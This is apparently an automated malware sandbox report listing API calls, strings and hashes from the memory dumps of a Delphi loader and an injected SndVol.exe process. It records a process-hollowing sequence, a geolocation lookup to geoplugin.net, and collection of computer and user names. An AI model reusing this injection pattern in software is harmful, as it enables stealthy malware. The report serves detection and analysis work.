API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: f4e2dafb3d610cbbb51cfe7f19e9c26d912ffe911294ad2613f08c3628e34de0
Instruction ID: d312ab301f2254c2170ecc0881154880ba5b0798281ead06face420b167148f9
Opcode Fuzzy Hash: f4e2dafb3d610cbbb51cfe7f19e9c26d912ffe911294ad2613f08c3628e34de0
Instruction Fuzzy Hash: 2101B176A8430CBEEB21DB908D82BBE77ECDB4DB10F1005A2BA04D65C0E6759A10DB58

Function 0290A9C8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0290AA5F,?,?,00000000), ref: 0290A9E0

Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0290AA5F,?,?,00000000), ref: 0290AA10
EnumCalendarInfoA.KERNEL32(Function_0000A914,00000000,00000000,00000004), ref: 0290AA1B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0290AA5F,?,?,00000000), ref: 0290AA39
EnumCalendarInfoA.KERNEL32(Function_0000A950,00000000,00000000,00000003), ref: 0290AA44

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 473ed1f446f31644aeb4fc8fde24600b1abd13166b5ae331ee11f423c5f11b69
Instruction ID: 6287336fed5ab5723a29b3940b63456a9add5d0738b129fe41eb137af46c598e
Opcode Fuzzy Hash: 473ed1f446f31644aeb4fc8fde24600b1abd13166b5ae331ee11f423c5f11b69
Instruction Fuzzy Hash: 2001A23160035C6FF702A6B5CD92BAE739FDBC6720F910560F711E66D0E6649F108AE4

Function 0290AA78 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0290AC48,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0290AAA7

Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A

Strings

yyyy, xrefs: 0290AB9D
eeee, xrefs: 0290ABB6
ggg, xrefs: 0290AB8D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: d51ab6fcc059bfbbe5d43e33f2fa36749245b33db88395fa7890ac3dac8983ca
Instruction ID: 10071c20d8adc47cdb1f35175394282a5bf0c574b43a2c682772c277929a849b
Opcode Fuzzy Hash: d51ab6fcc059bfbbe5d43e33f2fa36749245b33db88395fa7890ac3dac8983ca
Instruction Fuzzy Hash: 0741E33170431D4FD711EBA988C06BEB3EBDBD6300B554929D762C73C4EA64AD468AA1

Function 02900CCB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 029058B4: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
Part of subcall function 029058B4: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
Part of subcall function 029058B4: lstrcpyn.KERNEL32(?,?,?), ref: 02905918

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77

Strings

}, xrefs: 02905AFC

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: QueryValue$AddressCloseHandleModuleProclstrcpyn
String ID: }
API String ID: 22635895-4239843852
Opcode ID: b24030859cdb6e7e831b5dd58ed769a068d5a0198f0d1f7cbdb6ee32071737f2
Instruction ID: 5185f71fabdc45cdedf7323e611dc547fd82d6ae0b4f8773bb748ca9e44c535e
Opcode Fuzzy Hash: b24030859cdb6e7e831b5dd58ed769a068d5a0198f0d1f7cbdb6ee32071737f2
Instruction Fuzzy Hash: 7011A07150438DAEFB11DAA4C885BEFBBBCBF49710F514196EA00D61C1C778A504CF60

Function 0290C3EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0290C3F2
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0290C403

Strings

GetDiskFreeSpaceExA, xrefs: 0290C3FD
kernel32.dll, xrefs: 0290C3ED

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: c121713c2a42c25160c391e61da0bab020a2643f75a2b2c94affe7326bbe286d
Instruction ID: a1b98e2fa954ab1d3e9e7f09e17e5df47859a1bdf211fdeac0224e0bc5b740f4
Opcode Fuzzy Hash: c121713c2a42c25160c391e61da0bab020a2643f75a2b2c94affe7326bbe286d
Instruction Fuzzy Hash: 44D0C9F2E8535D5FF7206FF26CC1A3236DCAB88318B41A92AE205461C1D7B1842A9FD4

Function 0290E160 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E20F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E22B
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E2A2
VariantClear.OLEAUT32(?), ref: 0290E2CB

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: e454758d02ecb7eb5fef641bc4cf03a6dc8f2b56ec6aa20db7c5932fd86c9bf1
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: AE41FB75A0021D9FCB65EB58CCD0BC9B3BDEB8C710F0045E5E649A7291DA30AF808F60

Function 0290ACB4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 23dbdd14fe9d38846fd388a9ab0128d767f9bb8c82b4fa1d43643044ab41dafc
Instruction ID: 8ee35ae86987421e93f0d47642cf30c2e539734ea4107beffe104f20c40086e3
Opcode Fuzzy Hash: 23dbdd14fe9d38846fd388a9ab0128d767f9bb8c82b4fa1d43643044ab41dafc
Instruction Fuzzy Hash: B941E771A0025C9FDB21DBA8CCC4BDAB7FDAB58311F0040E9A648A7291DB749E948F50

Function 0290ACB2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: a75af8e0bc50474044bdee44c7a3d91fa062693309e32848feb5aaa058703f13
Instruction ID: 87ebf428cd4257ed341b0b9a3b79f27307146dcc83c4fcda49600371b7ef355f
Opcode Fuzzy Hash: a75af8e0bc50474044bdee44c7a3d91fa062693309e32848feb5aaa058703f13
Instruction Fuzzy Hash: A841E871A0025C9FDB21EB68CCC4BDAB7EDAB58311F4440E5A648E7291DB749E94CF50

Function 0291A2B8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A2EC
IsBadHugeWritePtr.KERNEL32(?,00000004), ref: 0291A31C
IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 0291A33B
IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A347

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Huge$Read$Write
String ID:
API String ID: 1732373845-0
Opcode ID: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
Instruction ID: ba595aeae661183e5e07f1b094958f6ce9b98eb914ca4a627223286cca9982ee
Opcode Fuzzy Hash: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
Instruction Fuzzy Hash: 3F21B4B1A4121D9FDB20CF6ACC84BAE73A9EF80361F148516EE5097380D734DC12CAA0

Function 02909464 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02909552), ref: 029094EA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02909552), ref: 029094F0

Strings

yyyy, xrefs: 029094C5

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: a0a03db0ca663ae6e8f820c48d06d64697ee953ce7cf3197b6cd0921637d3df4
Instruction ID: 1a9ecd505b048fbc5c12a137f11615e6fc34324d3ff8b77042fbd7f19539d8cd
Opcode Fuzzy Hash: a0a03db0ca663ae6e8f820c48d06d64697ee953ce7cf3197b6cd0921637d3df4
Instruction Fuzzy Hash: C9216271A0021C9FEB11DF99C8C1AAEB3B9EF88B10F4140A5EE45E7291D7349E40DBA5

Function 02901C6F Relevance: 5.3, APIs: 4, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3b47abda850ddaccb5c2c98e0e371ba4830067759e1d3c4c66b943532310b9
Instruction ID: 95f8a97841f589d96e57d507367f42058782693940825b4ec9639f8aa2c3c11b
Opcode Fuzzy Hash: 0e3b47abda850ddaccb5c2c98e0e371ba4830067759e1d3c4c66b943532310b9
Instruction Fuzzy Hash: A9A1C1A67106080FD719AA7C9CC43BEB2CADBC4365F28427EE61DCB3D1EB68C9518650

Function 02906444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0290644D
TlsGetValue.KERNEL32(0000001D), ref: 02906462

Strings

(x, xrefs: 02906467

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AllocValue
String ID: (x
API String ID: 1189806713-2016957024
Opcode ID: e38119dd502e31bd2a3689d3fcaed04db38c78a6a0e2e59d4c7d4a0e434d6114
Instruction ID: f014eea5eb0ac21912d5352b136741f5ef883cc77938649df2eca3fff61449b2
Opcode Fuzzy Hash: e38119dd502e31bd2a3689d3fcaed04db38c78a6a0e2e59d4c7d4a0e434d6114
Instruction Fuzzy Hash: 94C012B1D453088EEB10BBB0A08472937ADAB80310B006C20B408C7188DB39C834AF98

Analysis Process: SndVol.exePID: 6352, Parent PID: 5900COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	99.4%
Signature Coverage:	4.3%
Total number of Nodes:	1726
Total number of Limit Nodes:	49

Executed Functions

Function 004180EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
NtClose.NTDLL(?), ref: 004182F7
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
NtClose.NTDLL(?), ref: 00418468
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwCreateSection, xrefs: 0041811C
ZwMapViewOfSection, xrefs: 0041813B
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwUnmapViewOfSection, xrefs: 0041814F
ZwClose, xrefs: 00418163

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 3150337530-3035715614
Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Function 1E6C10F1 Relevance: 12.1, APIs: 8, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1E6C1137
lstrcatW.KERNEL32(?,?), ref: 1E6C1151
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C115C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C116D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C117C
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C1193
FindNextFileW.KERNELBASE(00000000,00000010), ref: 1E6C11D0
FindClose.KERNEL32(00000000), ref: 1E6C11DB

Memory Dump Source

Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true

Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd

Similarity

API ID: lstrlen$Find$File$CloseFirstNextlstrcat
String ID:
API String ID: 1083526818-0
Opcode ID: 5e4c8985af701ec14ce36a387aa744eb6fc187f82971ee267744b73ab2aebcc7
Instruction ID: 226cc7d71e4c9ee25880edf2861da4ad2fcb395ceece4f7c94fa01b9bbbb2966
Opcode Fuzzy Hash: 5e4c8985af701ec14ce36a387aa744eb6fc187f82971ee267744b73ab2aebcc7
Instruction Fuzzy Hash: 5A216171644358ABD710EE649C4CF9B7BECEF84714F400E2AF958D3190EB74E6058796

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 141df06f7ff4380f714519ca4b37ae7b5b729db64280299abff6e316310e0a66
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: 141df06f7ff4380f714519ca4b37ae7b5b729db64280299abff6e316310e0a66
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

4.9.4 Pro, xrefs: 0040F836, 0040F8A3
override, xrefs: 0040F7CC
pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.4 Pro$override$pth_unenc
API String ID: 2281282204-930821335
Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Function 0535114A Relevance: 3.4, APIs: 2, Instructions: 381memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 0535130F
LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 05351466

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 7e17c64fc21983895fcf5bd993b9c76f24004772564de837fe521de7ce446b14
Instruction ID: 52cb223b810774f14487135d324561d51a0404e9d858f0ee0a8df2e35fc7fc1a
Opcode Fuzzy Hash: 7e17c64fc21983895fcf5bd993b9c76f24004772564de837fe521de7ce446b14
Instruction Fuzzy Hash: 64D1D571A00205AFDB18CF69CC94FAEB7B6FF84320F199159ED46AB695DB70E900CB50

Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
